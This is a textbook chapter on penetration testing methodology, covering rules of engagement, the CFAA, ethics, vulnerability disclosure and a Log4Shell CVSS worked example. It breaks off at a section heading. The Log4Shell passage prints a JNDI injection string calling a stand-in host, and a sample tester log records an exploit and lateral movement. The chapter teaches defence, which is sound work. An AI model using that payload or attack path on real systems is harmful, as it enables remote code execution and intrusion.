Chapter 6: Penetration Testing Methodology#
“Offense informs defense. To defend a system, you must first understand how it is attacked, under rules, with permission, and to a purpose.” – a guiding principle of professional penetration testing
Part II examined threats and the human element, and Chapter 5 showed how risk management decides what to defend. But how does an organization discover the vulnerabilities that feed the risk register in the first place? The answer is to attack itself, under controlled, authorized conditions. This chapter opens Part III, Offensive Security, with the methodology, the legal framework, and the ethics that turn hacking from a crime into a profession. Everything that follows in Chapters 7 through 10, reconnaissance, scanning, exploitation, and web attacks, happens inside the disciplined structure established here.
Learning Objectives#
After completing this chapter, you will be able to:
Define penetration testing and distinguish it from vulnerability assessment and red-team engagements.
Distinguish the “hats” (white, gray, black) and team colors (red, blue, purple).
Compare testing knowledge levels: black-box, gray-box, and white-box (crystal-box).
Describe the phases of a penetration test and the major methodologies (PTES, NIST SP 800-115, OSSTMM).
Construct rules of engagement (RoE) and a proper scope, and explain why authorization is paramount.
Explain the legal framework governing security testing, including the Computer Fraud and Abuse Act (CFAA) and related statutes.
Apply professional ethics and coordinated vulnerability disclosure, including bug-bounty practice.
Write a useful penetration-test report with risk-ranked findings.
Key Terms#
Penetration test (pen test): an authorized, simulated attack on systems to find and validate exploitable vulnerabilities.
Vulnerability assessment: identification and ranking of vulnerabilities, typically without exploitation.
Red team: an authorized adversarial team emulating real attackers; blue team: the defenders; purple team: red and blue working together to improve detection.
White / gray / black hat: an authorized helper; an unauthorized but non-malicious actor; an unauthorized malicious attacker.
Black-box / gray-box / white-box (crystal-box) testing: testing with no, partial, or full knowledge of the target.
Rules of engagement (RoE): the document defining scope, constraints, and conduct of a test.
Scope: the systems, networks, and activities authorized for testing.
PTES (Penetration Testing Execution Standard): a widely used methodology.
CFAA (Computer Fraud and Abuse Act): the principal U.S. anti-hacking statute.
CVD (Coordinated Vulnerability Disclosure): the practice of reporting vulnerabilities responsibly.
6.1 Why Methodology Matters#
It would be tempting to think of penetration testing as simply “trying to break in,” but unstructured attacking is both ineffective and dangerous. A methodology, a defined, repeatable process, is what separates a professional engagement from random poking, and it exists for three reasons. First, completeness: a methodology ensures the tester systematically covers the attack surface rather than fixating on the first interesting finding, so that the test reflects what a real, patient adversary could achieve. Second, safety: testing against production systems can cause outages and data loss, so a disciplined process with agreed rules protects the client’s operations. Third, defensibility and repeatability: a documented methodology makes results reproducible, comparable over time, and credible to auditors, regulators, and courts, and it ties the test back to the risk-management process of Chapter 5, where its findings become entries in the risk register.
Penetration testing sits within a larger spectrum of security assessments. A high-level (Level I) assessment reviews policies and procedures with no hands-on testing, asking whether the right policies exist, are followed, and are sufficient. A network evaluation (Level II) adds hands-on activities such as information gathering and vulnerability scanning. A penetration test (Level III) takes an adversarial role, seeking to discover what an attacker can actually access and control, and is less concerned with policy than with demonstrating real impact. Understanding where a pen test fits in this spectrum keeps expectations realistic: it is a focused, time-bounded snapshot, not an exhaustive guarantee of security.
The chapter proceeds from definitions and roles, through the phased methodology and the all-important rules of engagement, to the legal and ethical framework that authorizes the work, and finally to disclosure and reporting. We begin by defining precisely what a penetration test is, and is not.
The phrase “offense informs defense” captures why this entire part of the book exists. Defenders who have never thought like attackers tend to protect the wrong things, over-investing in compliance checkboxes while leaving real attack paths open. By systematically adopting the adversary’s perspective, under authorization, penetration testing reveals how defenses actually fail in combination, not in theory. This is also why the same individual increasingly needs both skill sets: the best defenders understand offense, and the most useful testers understand how their findings translate into defensive priorities. The chapters that follow build the offensive skills, but always in service of this defensive purpose, which is the ethical and professional core that separates the security practitioner from the criminal.
6.2 What Penetration Testing Is, and Is Not#
Having argued for methodology, we must define the activity itself, because “penetration test” is often used loosely for very different services. A penetration test is an authorized attack on one or more computers or networks to identify security weaknesses and then exploit them to validate the severity of the vulnerabilities, in order to assist risk management. Three elements of that definition are essential: the test is authorized (the dividing line from crime), it goes beyond finding weaknesses to actually exploiting them (the dividing line from a vulnerability scan), and its purpose is to inform risk decisions, not to cause harm.
This distinguishes a pen test from a vulnerability assessment, which identifies and ranks vulnerabilities, often with automated scanners, but typically does not exploit them. A vulnerability assessment answers “what weaknesses might exist?”; a penetration test answers “what can an attacker actually do with them?” The two are complementary: an assessment offers broad, inexpensive coverage, while a pen test offers narrow, deeper, more expensive validation. A red-team engagement goes further still, emulating a specific real-world adversary over an extended period, often testing detection and response (the blue team) as much as the technology, and frequently with a defined objective such as reaching a particular “crown jewel” asset.
It is equally important to state a pen test’s limits honestly, because overselling them is a common failure. A penetration test will not discover every vulnerability, will not use every possible exploit, and is only a snapshot in time; the real adversary faces none of the test’s constraints of duration, scope, permitted methods, or tester skill. A clean report means “the testers, within these limits, did not find a way in,” not “the system is secure.” Setting this expectation with stakeholders is part of professional practice, and it is why pen testing complements, rather than replaces, the continuous risk management of Chapter 5 and the monitoring of Chapter 12.
It is worth stating the business reasons organizations commission ethical hacking, because they shape an engagement’s goals. The most common drivers are a security breach (an incident has revealed a lapse and the organization needs to understand its exposure), compliance with a law, regulation, or industry standard that mandates testing, and due diligence (a structured evaluation, for example before a merger or a major deployment, so decision-makers can weigh costs, benefits, and risks with better information). Other drivers include validating a new system before launch, satisfying customer or partner security requirements, and measuring the effectiveness of the security team and its controls. Knowing the business driver tells the tester what the client actually needs from the engagement, whether broad assurance, a specific compliance attestation, or a realistic adversary simulation, and it keeps the work anchored to value rather than to finding vulnerabilities for their own sake.
The relationship among the three main assessment types is summarized below.
Dimension |
Vulnerability assessment |
Penetration test |
Red-team engagement |
|---|---|---|---|
Goal |
Find and rank weaknesses |
Exploit to validate impact |
Emulate a real adversary; test detection |
Exploitation |
Usually none |
Yes, within scope |
Yes, plus stealth and persistence |
Breadth vs depth |
Broad, shallow |
Narrow, deep |
Goal-focused, deep, covert |
Knowledge of defenders |
Defenders usually aware |
Defenders usually aware |
Often only a few defenders aware |
Typical cost |
Lower |
Moderate |
Highest |
Primary output |
Ranked vulnerability list |
Risk-ranked exploited findings |
Attack narrative + detection gaps |
6.3 Hats and Team Colors#
The culture of security borrows a vivid vocabulary for the actors involved, and using it precisely matters because the distinctions are ultimately about authorization and intent, the same axes that defined the adversary model in Chapter 1. The “hat” metaphor, drawn from old Western films, classifies individuals. A white-hat hacker is legally authorized to discover and exploit vulnerabilities with the intent to improve security; this is the ethical hacker, the professional penetration tester. A black-hat hacker acts without any authorization and with malicious or self-serving intent, operating outside the law. A gray-hat hacker occupies the middle: skilled and often not malicious, but acting without complete authorization or by non-authorized methods, for example probing a system uninvited and then reporting what they find. The gray-hat’s good intentions do not make the activity legal, a point the legal section makes concrete.
A second vocabulary describes teams in an organized exercise. The red team plays the attacker, emulating adversaries to test defenses. The blue team plays the defender, operating the monitoring, detection, and response capabilities of Chapters 12 and 14. The purple team is not a separate group but a mode of working in which red and blue collaborate directly, the red team sharing techniques so the blue team can immediately improve detection, maximizing the learning from an engagement. In military and government contexts a red team may be formally certified, and the term penetration tester specifically denotes someone who conducts authorized offensive attacks against predesignated targets to discover and exploit vulnerabilities. Throughout this book, every offensive technique is presented for the white-hat, authorized purpose; the same action without authorization is the black-hat crime described next.
6.4 Knowledge Levels: Black, Gray, and White Box#
Beyond who performs a test, engagements differ in how much the tester is told about the target in advance, and this choice shapes cost, realism, and coverage. The levels are named by “box” color. In black-box testing, the tester has no prior knowledge of the environment and must discover everything from the outside, which most realistically simulates an external attacker but spends significant time on reconnaissance and may miss internal issues. In gray-box testing, the tester has partial knowledge, perhaps user-level credentials or network diagrams, which balances realism against efficiency and is a common real-world choice, well suited to simulating an attacker who has gained a foothold or a malicious insider with limited access. In white-box (also called crystal-box) testing, the tester has full knowledge, source code, architecture, prior scan results, which decreases time spent on discovery and maximizes coverage, making it ideal for thorough, efficient assessment though less representative of a blind external attack.
The trade-offs are direct. Black-box testing is the most intrusive in spirit and narrowest in focus and tends to be the most expensive per finding because so much effort goes into discovery; white-box testing is minimally intrusive, widest in focus, and least costly per issue found, but it relies on the client sharing sensitive information and does not measure how hard a real outsider would have to work. Many engagements blend levels, beginning black-box to gauge external exposure and then shifting to gray- or white-box to ensure thorough internal coverage within the available time. Choosing the right knowledge level is part of scoping, the subject of the rules-of-engagement section, and it should follow directly from the client’s goal: simulate a specific threat, achieve maximum coverage, or something in between.
6.5 The Phases of a Penetration Test#
With the actors and knowledge levels defined, we can lay out the process a test follows, which is remarkably consistent across methodologies because it mirrors how real attackers operate. The classic attack phases, which structure Chapters 7 through 9, are: reconnaissance and footprinting (gathering information, largely passively); scanning and enumeration (active reconnaissance to map hosts, ports, services, and accounts); gaining access (the initial exploit and entry); escalation of privilege (moving from limited to administrative control); maintaining access (ensuring the foothold persists); and post-exploitation validation and cleanup. This last phase is where an authorized tester differs sharply from a real attacker: rather than destroying logs to hide, the tester documents what was done, preserves the evidence the client needs, and removes only the tools, accounts, and changes introduced during the engagement so the environment is left as it was found. (Throughout this book the role is called a penetration tester; the terms ethical hacker and security assessor are used interchangeably in industry, but penetration tester is the standard term used here.) For the ethical tester a seventh phase, reporting, replaces the malicious attacker’s stealth as the true end goal, and an explicit permission phase precedes everything.
graph LR
P[Permission / Scoping] --> R[Reconnaissance]
R --> S[Scanning & Enumeration]
S --> G[Gaining Access]
G --> E[Privilege Escalation]
E --> M[Maintaining Access]
M --> C[Post-Exploitation<br/>Validation & Cleanup]
C --> RPT[Reporting]
RPT -.remediation & retest.-> P
Several formal methodologies codify this flow. The Penetration Testing Execution Standard (PTES) defines seven phases, pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting, and is among the most widely referenced. NIST Special Publication 800-115, the U.S. government’s technical guide to information security testing, frames testing as planning, discovery, attack, and reporting. The Open Source Security Testing Methodology Manual (OSSTMM) offers a rigorous, metrics-driven approach, and the OWASP Testing Guide specializes the process for web applications (Chapter 10). These methodologies agree far more than they differ; what matters is choosing one, following it consistently, and documenting the work so results are complete, safe, and repeatable. The distinctive feature of the ethical process is that it is bracketed by authorization at the start and reporting and remediation at the end, transforming the attacker’s kill chain into a constructive engagement.
It is worth walking the PTES phases in a little more detail, since they map onto the rest of Part III. Pre-engagement interactions establish scope and rules (Section 6.7). Intelligence gathering is reconnaissance (Chapter 7). Threat modeling prioritizes targets by likely attacker goals, reusing the methods of Chapter 5. Vulnerability analysis identifies weaknesses (Chapter 8). Exploitation gains access (Chapter 9), and post-exploitation determines the value of what was reached, escalating privileges, pivoting to other systems, and assessing business impact. Reporting communicates it all. NIST SP 800-115’s four phases map cleanly onto this: planning corresponds to pre-engagement, discovery to intelligence gathering and vulnerability analysis, attack to exploitation and post-exploitation, and reporting to reporting. Recognizing that these named methodologies describe the same underlying flow lets a tester move fluidly between client requirements, certification frameworks, and the chapters of this book.
The methodologies can be compared at a glance, which helps in selecting one for a given client and context.
Methodology |
Origin / focus |
Phases (summary) |
Best for |
|---|---|---|---|
PTES |
Community standard, general |
7: pre-engagement, intel, threat modeling, vuln analysis, exploitation, post-exploitation, reporting |
General network/enterprise tests |
NIST SP 800-115 |
US government, technical |
4: planning, discovery, attack, reporting |
Government and compliance contexts |
OSSTMM |
ISECOM, metrics-driven |
Operational security testing channels and metrics |
Rigorous, measurable assessments |
OWASP Testing Guide |
OWASP, web apps |
Web-specific test cases |
Web application testing (Ch.10) |
MITRE ATT&CK (knowledge base) |
MITRE, adversary behavior |
Tactics and techniques catalog |
Red-team emulation, detection mapping |
6.6 Types of Penetration Tests#
Before scoping an engagement, both tester and client must agree on what kind of test it is, because the target surface dictates the tools, skills, and rules required. Engagements are commonly categorized by the surface they probe. An external network test attacks internet-facing assets (web servers, mail servers, VPN gateways) as a remote outsider would, measuring perimeter exposure. An internal network test assumes the perspective of an attacker who already has a foothold or of a malicious insider, probing for lateral movement and privilege escalation once inside, a perspective whose importance the assume-breach philosophy of Chapter 1 underscores. A web application test focuses on the application layer using the OWASP methodology of Chapter 10, covering injection, authentication, and session flaws. A wireless test assesses Wi-Fi and other radio networks (Chapter 3), and a social-engineering test targets people through phishing and pretexting (Chapter 4), measuring human and procedural resilience.
Further categories address modern and physical surfaces. A physical penetration test attempts to defeat locks, badges, and facility controls to reach systems directly (Chapter 4), often combined with social engineering. Cloud penetration testing assesses cloud configurations and identity within the shared- responsibility model (Chapter 17), and must respect the cloud provider’s testing rules. Mobile and Internet-of-Things testing targets apps and devices (Chapters 16 and 17). Many real engagements combine several types, and the choice flows directly from the client’s goal and risk profile. The category also determines specialized rules of engagement: a physical test needs an authorization letter the tester carries to avoid arrest, a social-engineering test needs careful boundaries to protect employees, and a cloud test needs the provider’s permission. Naming the test type precisely is therefore the first scoping decision, and it shapes everything that follows.
A practical consequence of these categories is that each demands different expertise and safety precautions, so staffing and rules of engagement follow from the type chosen. A web test needs application-security skills and the OWASP methodology; a wireless test needs radio equipment and proximity; a physical test needs social finesse and a signed authorization letter the tester physically carries to prove permission if challenged; a cloud test needs familiarity with the provider’s architecture and its testing policy; and an operational-technology test (Chapter 20) demands extreme caution because a crashed industrial controller can have physical-safety consequences. Recognizing that “penetration test” is an umbrella over these distinct disciplines prevents the common mistake of scoping or staffing an engagement as if all targets were the same.
6.7 Pre-Engagement: Scope and the Rules of Engagement#
The single most important phase happens before any packet is sent: defining what will be tested and how. Getting this wrong is how well-intentioned tests cause outages, breach the law, or deliver useless results, so professionals invest heavily here. Scope specifies the goal and the boundaries: which specific targets, networks, and applications are in or out, which attack vectors (external, internal, wireless, client-side, social engineering) are permitted, and the constraints of funding and timeframe. A constant danger is scope creep, the gradual expansion of testing beyond what was authorized, which the team guards against by staying focused on the agreed goal.
The scope and all conduct rules are captured in the rules of engagement (RoE), the most important document of the engagement and effectively the contract that authorizes and bounds it. A thorough RoE contains: a concept of operations explaining why the test is being done; the scope and focus; roles and responsibilities identifying stakeholders and points of contact; the assessment methodology; what information is provided to testers; the general rules of engagement (the do’s and don’ts); data handling rules for how client data is treated during and after; post-assessment restoration responsibilities; documentation guidelines and metrics; dispute resolution; the approval signatures of those authorized to grant permission; and appendices such as in-scope and out-of-scope IP lists and an event-termination memorandum.
The general rules deserve special attention because they prevent real harm. They identify exact locations, permitted dates and times, and systems explicitly out of scope; they list the testing team’s source IP addresses and designate a single client monitor who is the only point of contact and who has the authority to halt the test; and they answer pointed questions in advance, are denial-of-service, man-in-the-middle, rebooting, physical entry, and social engineering permitted, and how must critical vulnerabilities be reported immediately. The RoE also plans for defensive reactions: if the team is “shunned” (its traffic auto-blocked by an intrusion prevention system reconfiguring firewalls), an exemption list agreed in advance prevents the test from collapsing into a self-inflicted denial of service. Finally, the RoE specifies what testers must do afterward, removing artifacts and assisting with restoration. A disciplined RoE is what makes aggressive testing safe and lawful, and it embodies the chapter’s recurring theme that authorization, written and specific, is the foundation of the entire profession.
To make the operational side concrete, professional testers keep a running log that becomes both the report’s backbone and a legal record. A simplified extract of such operational notes might read:
Critical path: Kali (192.168.1.10) -> FS1 (10.10.10.100) -> DC1 (10.10.10.101)
2026-06-02 13:42 nmap -T4 -Pn -sT -p 443,445,389,3389 10.10.10.100
443 Apache 2.0.48 ; 3389 RDP ; 445 SMB
2026-06-02 13:59 Vulnerable Apache; launched authorized Metasploit exploit -> Meterpreter session
2026-06-02 14:12 Post-exploitation survey of FS1; located cached credentials
2026-06-02 14:40 Lateral movement to DC1 using recovered credentials (success) -- NOTIFIED MONITOR
Every action carries a timestamp, the exact command, the result, and any notification made, so that the engagement is fully reconstructable. This discipline supports the report, enables deconfliction with the blue team, and protects the tester if the work is ever questioned.
6.8 The Legal Framework#
Because the only difference between a penetration test and a felony is authorization, every professional must understand the laws that govern computer access, since a misstep can end a career or result in prosecution regardless of good intentions. In the United States the cornerstone is the Computer Fraud and Abuse Act (CFAA), 18 U.S.C. 1030, which criminalizes accessing a computer “without authorization” or in a manner that “exceeds authorized access.” Related provisions include 18 U.S.C. 1029 (fraud in connection with “access devices” such as passwords and card numbers, the “Access Device Statute”). The breadth of the phrase “exceeds authorized access” was long contested; the Supreme Court narrowed it in Van Buren v. United States (2021), holding that it does not cover merely violating a website’s terms of use or an employer’s policy when one is otherwise entitled to access the data, an important limit for security researchers.
Other statutes round out the framework. The Digital Millennium Copyright Act (DMCA) can implicate research that circumvents technological protection measures, though it includes a security-research exemption. The Electronic Communications Privacy Act (ECPA) and the Wiretap Act govern the interception of communications, directly relevant to sniffing and man-in-the-middle techniques. Many U.S. states have their own computer-crime laws, and other countries have analogs such as the United Kingdom’s Computer Misuse Act. Beyond statutes, contracts matter: the rules of engagement, master services agreement, and any non-disclosure agreement define the authorization that makes the work lawful, which is why testing must never begin until signed, written permission from a party with authority to grant it is in hand.
Knowledge Check
What single factor most fundamentally separates a lawful penetration test from a CFAA violation?
Why was the Supreme Court’s decision in Van Buren v. United States significant for security researchers?
Answers: (1) Authorization, documented, specific permission from a party entitled to grant it; the same technical action is lawful with it and criminal without it. (2) It narrowed “exceeds authorized access” so that merely violating terms of service or use policies, while otherwise authorized to access the data, is not itself a federal crime, reducing the risk that routine research is treated as a CFAA felony.
Two further legal dimensions matter in practice. First, international and cross-border testing multiplies the legal complexity: data-protection laws (such as the GDPR of Chapter 18), differing computer-crime statutes, and restrictions on cross-border data transfer can all apply when targets, data, or testers span jurisdictions, so engagements with any international element require legal review. Second, intellectual-property and contractual constraints shape what a tester may keep or disclose: non-disclosure agreements bind the tester to confidentiality, and the ownership of tools, scripts, and the report itself should be settled in the contract. The overarching rule remains simple to state and essential to honor: obtain explicit, written authorization from someone with the authority to grant it, keep that authorization within the bounds of the rules of engagement, and when anything is legally ambiguous, stop and consult counsel before proceeding.
6.9 Ethics and Professional Conduct#
Authorization makes testing legal; ethics makes it trustworthy. Because penetration testers are granted deep access to their clients’ most sensitive systems, the profession depends on a strong ethical foundation, and most certifying bodies require adherence to a formal code. The EC-Council, (ISC)2, and SANS/GIAC codes share common commitments: protect society and the client, act honestly and legally, perform only authorized work, maintain confidentiality of everything learned during an engagement, avoid conflicts of interest, and practice within one’s competence. The (ISC)2 Code of Ethics, for instance, obliges members to protect society and the common good and to act honorably, honestly, and legally.
In practice, several ethical duties recur. Testers must stay within scope even when an enticing out-of-bounds target appears. They must do no unnecessary harm, avoiding actions that could damage data or disrupt operations beyond what the RoE permits, and they must stop and immediately notify the client if they discover a critical vulnerability or evidence that the system is already compromised, prioritizing the organization’s welfare over completing the test. They must protect the data they access and the report they produce, both of which are extraordinarily sensitive. And they must report honestly, neither exaggerating findings to impress nor concealing failures. These duties are not bureaucratic niceties; they are what allow organizations to grant the trust that makes the profession possible, and a single betrayal can end a career and expose the tester to liability. Ethics, in short, is the professional’s reputation made operational, and it underpins the disclosure practices considered next.
Going Deeper (graduate/research): adversary emulation and ATT&CK
The most advanced engagements move beyond generic testing to adversary emulation: reproducing the specific tactics, techniques, and procedures (TTPs) of a named threat group relevant to the client’s sector, drawn from the MITRE ATT&CK knowledge base and threat intelligence. Rather than asking “what vulnerabilities exist?”, adversary emulation asks “if threat group X targeted us, would we detect and stop them?”, directly exercising the blue team’s detection and response (Chapters 12 and 14). Frameworks such as MITRE’s ATT&CK Evaluations and tools like Atomic Red Team and Caldera support repeatable emulation, and the purple-team model turns each emulated technique into a concrete detection improvement. This represents the maturation of penetration testing from finding flaws toward measuring and improving an organization’s resilience against realistic, intelligence-driven threats, and it is an active area of both industry practice and academic research in security operations.
Ethical maturity also means knowing when not to act. A tester who finds that a client is already breached, or who stumbles upon evidence of serious wrongdoing, faces duties that may extend beyond the engagement, and these situations should be anticipated in the rules of engagement and escalated rather than handled unilaterally. Likewise, testers must resist scope temptation, the lure of an interesting target just outside the authorized boundary, and capability temptation, the urge to demonstrate a flashy but destructive technique that the client did not sanction. The discipline to stay within bounds, even when technically capable of more, is precisely what earns the trust that the profession runs on. Ethics, in this sense, is not a constraint on skill but the framework that makes skill employable.
6.10 Vulnerability Disclosure#
A particular ethical question arises whenever a researcher discovers a vulnerability, especially outside a contracted engagement: what should they do with it? The answer has evolved into a set of recognized disclosure models, and understanding them is essential for anyone who finds a flaw in software they use. In full disclosure, the researcher publishes all details immediately; this pressures vendors to act and informs defenders, but it also arms attackers before a fix exists. In non-disclosure, details are withheld indefinitely, which protects no one if the vendor does nothing. The accepted middle path is responsible (or coordinated) disclosure: the researcher reports the vulnerability privately to the vendor and allows a reasonable period (commonly 90 days) for a fix before any public discussion, balancing the public’s right to know against the risk of premature exposure. The modern, formalized version is Coordinated Vulnerability Disclosure (CVD), often facilitated by a coordinator such as a national Computer Emergency Response Team (CERT) and tracked through the Common Vulnerabilities and Exposures (CVE) system that assigns each flaw a unique identifier.
Organizations increasingly invite this research. A vulnerability disclosure program (VDP) publishes a safe-harbor policy and a channel for reporting flaws, while a bug-bounty program additionally pays researchers for valid findings, with platforms such as HackerOne and Bugcrowd connecting researchers to companies. These programs convert would-be adversaries into allies and have become a standard part of mature security. The legal climate has shifted to support good-faith research as well.
Three companion systems give disclosure a common language and deserve definition. The Common Vulnerabilities and Exposures (CVE) system assigns each publicly known vulnerability a unique identifier (for example CVE-2021-44228 for the Log4Shell flaw). The Common Weakness Enumeration (CWE) classifies the type of underlying weakness (for example CWE-89 for SQL injection), which helps developers fix root causes. The Common Vulnerability Scoring System (CVSS) assigns a severity score from 0.0 to 10.0 based on exploitability and impact metrics, producing the Low/Medium/High/Critical bands used to prioritize remediation, exactly the ranking the report applies. Together, CVE names the instance, CWE names the class, and CVSS measures the severity, and fluency in all three is expected of working professionals. Bug-bounty economics build on these: payouts scale with severity (a critical remote-code-execution finding may earn many thousands of dollars), and mature programs have turned vulnerability discovery into a global, legitimate marketplace that channels researcher talent toward defense rather than the criminal underground or the gray market for exploits.
A sober complement to coordinated disclosure is the market for vulnerabilities. Beyond legitimate bug-bounty programs lies a gray market in which exploit brokers purchase zero-day vulnerabilities, often for far more than bounties pay, and resell them to governments or other buyers, and a black market in which they are sold to criminals. This economy creates genuine ethical tension, since a researcher who finds a serious zero-day faces competing incentives, responsible disclosure for modest or no pay, a large brokered payment, or criminal sale, and the choice has real consequences for public safety. The profession’s answer is unambiguous: ethical practice means coordinated disclosure that gets flaws fixed, not sale to those who would weaponize them, and the strengthening legal protections for good-faith research are meant in part to make the ethical path also the rational one. Understanding this market helps explain why nations stockpile exploits, why patching speed matters so much, and why the disclosure debate remains genuinely contested rather than settled.
The coordinated-disclosure process typically follows a recognizable timeline that benefits all parties: the researcher reports the flaw privately with enough detail to reproduce it; the vendor acknowledges receipt, validates it, and assigns it a CVE identifier; both agree on a remediation timeline (often around 90 days, with extensions for complex fixes); the vendor releases a patch; and only then does the researcher publish details, often coordinated with the vendor’s advisory so that defenders can act. Maturity on both sides matters: vendors that respond promptly and credit researchers build goodwill, while researchers who allow reasonable time and avoid grandstanding keep the public safer. When a vendor is unresponsive or hostile, coordinators such as a national CERT can mediate, and the threat of eventual disclosure provides the pressure that makes the system work. This structured process is the practical embodiment of the ethics discussed above, turning the discovery of a dangerous flaw into a net gain for security rather than a weapon.
Worked Example: CVE and CVSS in Practice (the Log4Shell case)#
To make CVE and CVSS concrete, consider the most consequential vulnerability of recent years,
Log4Shell, tracked as CVE-2021-44228. The CVE identifier itself follows the format
CVE-YYYY-NNNNN: the 2021 is the year it was reserved, and the digits are a unique serial, so the name
alone tells you nothing about severity, only that it is a specific, cataloged vulnerability. Disclosed in
December 2021, it affected Apache Log4j 2 (a ubiquitous Java logging library) in versions 2.0-beta9 through
2.15.0, and because Log4j is embedded in countless applications, it was estimated to expose hundreds of
millions of devices.
The weakness class is captured by CWE: Log4Shell is fundamentally an injection flaw (related to
CWE-502, deserialization of untrusted data, and improper input handling). The mechanism is striking in
its simplicity. Log4j supported a “message lookup” feature that interpreted special syntax in logged
strings, including a Java Naming and Directory Interface (JNDI) lookup. An attacker who could get the
application to log an attacker-controlled string such as ${jndi:ldap://evil.example/x} could make the
server reach out to a hostile LDAP server and load and execute remote Java code, achieving remote code
execution. The terrifying part was the trigger: merely logging a value an attacker controlled, for example
a crafted HTTP User-Agent header or a chat message, was enough, which is why it spread so fast.
The severity is quantified by CVSS. Log4Shell carries the maximum CVSS v3.1 base score of 10.0
(Critical), with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Reading that vector
explains the score: the attack is over the Network (AV:N), of Low complexity (AC:L), needs No
privileges (PR:N) and No user interaction (UI:N), Changes scope beyond the vulnerable component
(S:C), and yields High impact to Confidentiality, Integrity, and Availability. Every metric
is at its worst, which is exactly what produces a perfect 10.0. The remediation was to upgrade Log4j (to
2.17.1 and later, after follow-on fixes), disable the lookup feature, or remove the vulnerable class. The
worked code below shows how a CVSS vector maps to a score band and contrasts Log4Shell with a milder CVE.
# Chapter 6 -- Reading CVSS v3.1 vectors and comparing two real CVEs (illustrative)
def band(score):
if score == 0: return "None"
if score < 4.0: return "Low"
if score < 7.0: return "Medium"
if score < 9.0: return "High"
return "Critical"
# Real, published examples (base scores as recorded by NVD)
cves = [
("CVE-2021-44228", "Log4Shell (Apache Log4j RCE via JNDI)",
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", 10.0),
("CVE-2014-0160", "Heartbleed (OpenSSL memory over-read)",
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 7.5),
("CVE-2017-0144", "EternalBlue (SMBv1 RCE, basis of WannaCry)",
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 8.1),
]
print(f"{'CVE ID':16} {'Score':>5} {'Severity':9} Description")
print("-"*92)
for cid, desc, vector, score in cves:
print(f"{cid:16} {score:>5} {band(score):9} {desc}")
print()
# Decode the Log4Shell vector metric-by-metric
labels = {"AV":"Attack Vector","AC":"Attack Complexity","PR":"Privileges Required",
"UI":"User Interaction","S":"Scope","C":"Confidentiality","I":"Integrity","A":"Availability"}
vec = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
print("Decoding", vec, "(Log4Shell):")
for part in vec.split("/")[1:]:
k, v = part.split(":")
print(f" {labels.get(k,k):20}: {v}")
print("\nEvery metric at its worst -> base score 10.0 (Critical).")
CVE ID Score Severity Description
--------------------------------------------------------------------------------------------
CVE-2021-44228 10.0 Critical Log4Shell (Apache Log4j RCE via JNDI)
CVE-2014-0160 7.5 High Heartbleed (OpenSSL memory over-read)
CVE-2017-0144 8.1 High EternalBlue (SMBv1 RCE, basis of WannaCry)
Decoding CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Log4Shell):
Attack Vector : N
Attack Complexity : L
Privileges Required : N
User Interaction : N
Scope : C
Confidentiality : H
Integrity : H
Availability : H
Every metric at its worst -> base score 10.0 (Critical).
Current News: legal protection for good-faith security research
In a significant shift for ethical hackers, the U.S. Department of Justice revised its policy for charging Computer Fraud and Abuse Act cases to direct that good-faith security research should not be charged. The policy (announced in May 2022, with subsequent guidance referenced into 2025) defines good-faith security research as accessing a computer solely to test, investigate, or correct a security flaw in a manner designed to avoid harm and where findings are used primarily to improve security. Crucially, the policy is not a blank check: claiming “research” while extorting a device’s owner, or otherwise acting in bad faith, remains chargeable. Combined with the Supreme Court’s narrowing of “exceeds authorized access” in Van Buren v. United States (2021), the legal environment for legitimate researchers and bug-bounty participants has become meaningfully clearer, though researchers should still obtain authorization, follow program rules, and consult counsel for anything ambiguous. (Details per Department of Justice announcements and legal analyses; verify current policy before relying on it.)
6.11 The Test Environment and Toolkit#
A professional needs a reliable, well-managed platform from which to test, and building one correctly is itself part of safe practice. Penetration testers commonly work from a purpose-built Linux distribution that bundles hundreds of security tools; the historically important BackTrack distribution evolved into today’s Kali Linux, and Parrot OS is a popular alternative. Such a distribution provides, out of the box, the scanners, exploitation frameworks, and password tools used throughout this book, including Nmap, Metasploit, Wireshark, Aircrack-ng, John the Ripper, and Hashcat (cataloged in Appendix A). Commercial platforms such as Core Impact and Cobalt Strike, and scanners such as Nessus and Nexpose, complement the open-source toolkit.
Building and running the test system demands its own discipline. The platform should be deliberately chosen (a virtual machine for easy snapshotting and redeployment, or bare metal for performance and hardware access), and tools should be verified by hash against trusted sources, since a tampered tool can compromise the tester. Anti-virus and host firewalls may interfere with security tools and are managed carefully in an isolated environment, never by recklessly disabling protection on a machine exposed to the internet. During engagements, professionals use a fresh build for each test, never browse the web or handle personal data on the test system, run a packet capture to record activity, keep meticulous time-stamped operational notes (the basis of the eventual report and of any legal defense), and encrypt all collected and exfiltrated data, which will contain passwords, hashes, and vulnerability details. They also watch their own systems for “attack-backs” and resource exhaustion.
In-Class Exercise: stand up a safe lab
In groups, design (and, if resources permit, build) an isolated penetration-testing lab using virtualization software such as VirtualBox or VMware. Include one attacker virtual machine (Kali or Parrot OS) and one or more deliberately vulnerable targets (for example Metasploitable or a vulnerable web app such as DVWA), connected on a host-only network with no route to the internet or any production system. Document the network diagram, verify the tools’ download hashes, and write a one-paragraph “rules of engagement” for your own lab. Explain why isolation and hash verification matter. Do all testing only within this lab.
A note on tooling philosophy reinforces the chapter’s discipline. Tools are force multipliers, not substitutes for understanding: a tester who runs a scanner without grasping what it does will misread its output, miss what it cannot see, and may cause harm. Automated tools (scanners, exploitation frameworks) excel at breadth and repetition, while manual testing finds the logic flaws and chained attacks that automation misses, so professional engagements blend both. Equally, testers must understand their tools’ footprint, an aggressive scan can disrupt fragile systems, and some exploits can crash their targets, which is exactly why the rules of engagement specify what is permitted and why testers validate tools in a lab before pointing them at a client. The maxim is that the tester, not the tool, is responsible for every packet sent.
6.12 Threat Modeling and Intelligence in the Engagement#
